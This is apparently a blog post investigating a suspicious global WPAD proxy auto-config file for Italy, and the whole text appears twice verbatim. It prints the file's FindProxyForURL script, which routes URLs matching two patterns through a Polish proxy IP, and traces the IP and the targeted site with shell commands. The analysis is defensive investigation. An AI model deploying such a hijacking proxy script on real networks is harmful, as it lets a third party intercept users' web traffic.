The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II


After read­ing Jacopo’s arti­cle on WPAD, I’ve tried to under­stand the Ital­ian global wpad.it/wpad.dat:

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

The proxy

First thing that con­cerned me is that the IP address used as proxy is pol­ish:
$host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl

It’s reg­is­tered to a guy in Wlo­clawek, and it’s been up since Decem­ber 2008, so it’s pretty new.  The hosted site is syn­da­cated, which it’s usu­ally a fishy sign.

The syn­tax

The scripts pro­vides a fall back pol­icy to direct con­nec­tion to avoid server over­load, as described in wikipedia

 return "PROXY 72.55.164.182:80; DIRECT"

The reg­u­lar expression

I’ve down­loaded Alexa top 1-million sites list, which is daily updated, and I dis­cov­ered that the sec­ond reg­u­lar expression,

"http*//*s*st*mp*tn*sk*p*"

gets one and only one match: a pol­ish inter­net trad­ing site.

$cat top-1m.csv |sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p"
154967,systempartnerski.pl

The first reg­u­lar expres­sion, even with­out the ini­tial and final part, does not match any site in Alexa first million.

, , , ,

The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II


After read­ing Jacopo’s arti­cle on WPAD, I’ve tried to under­stand the Ital­ian global wpad.it/wpad.dat:

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

The proxy

First thing that con­cerned me is that the IP address used as proxy is pol­ish:
$host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl

It’s reg­is­tered to a guy in Wlo­clawek, and it’s been up since Decem­ber 2008, so it’s pretty new.  The hosted site is syn­da­cated, which it’s usu­ally a fishy sign.

The syn­tax

The scripts pro­vides a fall back pol­icy to direct con­nec­tion to avoid server over­load, as described in wikipedia

 return "PROXY 72.55.164.182:80; DIRECT"

The reg­u­lar expression

I’ve down­loaded Alexa top 1-million sites list, which is daily updated, and I dis­cov­ered that the sec­ond reg­u­lar expression,

"http*//*s*st*mp*tn*sk*p*"

gets one and only one match: a pol­ish inter­net trad­ing site.

$cat top-1m.csv |sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p"
154967,systempartnerski.pl

The first reg­u­lar expres­sion, even with­out the ini­tial and final part, does not match any site in Alexa first million.

, , , ,